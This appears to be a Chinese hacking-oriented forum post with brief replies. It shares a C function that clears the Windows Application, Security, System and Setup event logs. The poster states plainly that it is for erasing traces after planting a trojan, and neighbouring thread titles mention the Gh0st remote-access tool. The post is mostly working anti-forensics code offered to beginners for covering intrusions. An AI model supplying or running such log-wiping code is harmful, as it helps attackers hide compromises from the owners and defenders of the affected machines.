VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 1385|回复: 2

[交流] 今日一贴!清理系统事件查看器,新手观摩。

[复制链接]
75_avatar_middle
最佳答案
18 
online_supermod 发表于 2019-12-1 18:15:30 | 显示全部楼层 |阅读模式
这是一个用于清理系统事件的代码,自己这几天刚好学习到这块,分享一下,至于作用嘛,你下了马肯定要清理痕迹咯,当然这个是最基础的,大牛没有必要看,(清理完之后,还是会留下2条痕迹,知道有人清理过该事件,只用于新手交流)
void CleanEvent()
{
        char*strEvent[] = { "Application","Security","System","Setup" };
        for (int i = 0; i < sizeof(strEvent) / sizeof(char*); i++)
        {
                HANDLE hHandle = OpenEventLog(NULL, strEvent[i]);
                if (hHandle == NULL)
                {
                        continue;
                }
                ClearEventLog(hHandle, NULL);//清理打开的时间日志
                CloseEventLog(hHandle);//关闭事件句柄
        }
}








上一篇:关于Gh0st清理事件查看器
下一篇:今日一贴,分享一个Gh0st的打开对方cmd的窗口类文件

本帖被以下淘专辑推荐:

08_avatar_middle
最佳答案
3 
在线会员 发表于 2019-12-1 21:18:40 | 显示全部楼层
看懂了多谢。
58_avatar_middle
最佳答案
45 
online_vip 发表于 2019-12-1 21:34:32 | 显示全部楼层
终于找到了Windows日志相关函数,嘿嘿。
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

×【发帖 友情提示】
1、请回复有意义的内容,请勿恶意灌水;
2、纯数字、字母、表情等无意义的内容系统将自动删除;
3、若正常回复后帖子被自动删除,为系统误删的情况,请重新回复其他正常内容或等待管理员审核通过后会自动发布;
4、感谢您对VC驿站一如既往的支持,谢谢合作!

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号 )|网站地图wx_jqr

GMT+8, 2020-12-1 01:25

Powered by CcTry.CoM

© 2009-2020 cctry.com

快速回复 返回顶部 返回列表